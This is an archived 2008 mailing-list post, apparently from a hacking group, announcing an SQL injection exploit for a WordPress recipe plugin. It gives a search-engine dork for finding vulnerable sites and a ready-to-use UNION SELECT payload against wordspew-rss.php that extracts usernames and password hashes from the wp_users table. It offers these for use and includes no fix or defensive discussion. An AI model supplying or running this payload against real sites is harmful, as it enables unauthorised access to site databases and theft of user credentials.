Wordpress Plugin (wp-content/recipe) SQL Injection

hackturkiye . hackturkiye Mon, 18 Feb 2008 08:57:35 -0800

#########################################################################

#


# Wordpress Plugin (wp-content/recipe) SQL Injection

#  

######################################################################### 

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME : http://www.hackturkiye.com/ 


#########################################################################

#

#  DORK 1 : allinurl:  "wp-content/recipe"

# 

#########################################################################

  EXPLOIT : 


wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users


#########################################################################

# [EMAIL PROTECTED]           GOOD LUCKY          [EMAIL PROTECTED] 

#########################################################################

Wordpress Plugin (wp-content/recipe) SQL Injection

Reply via email to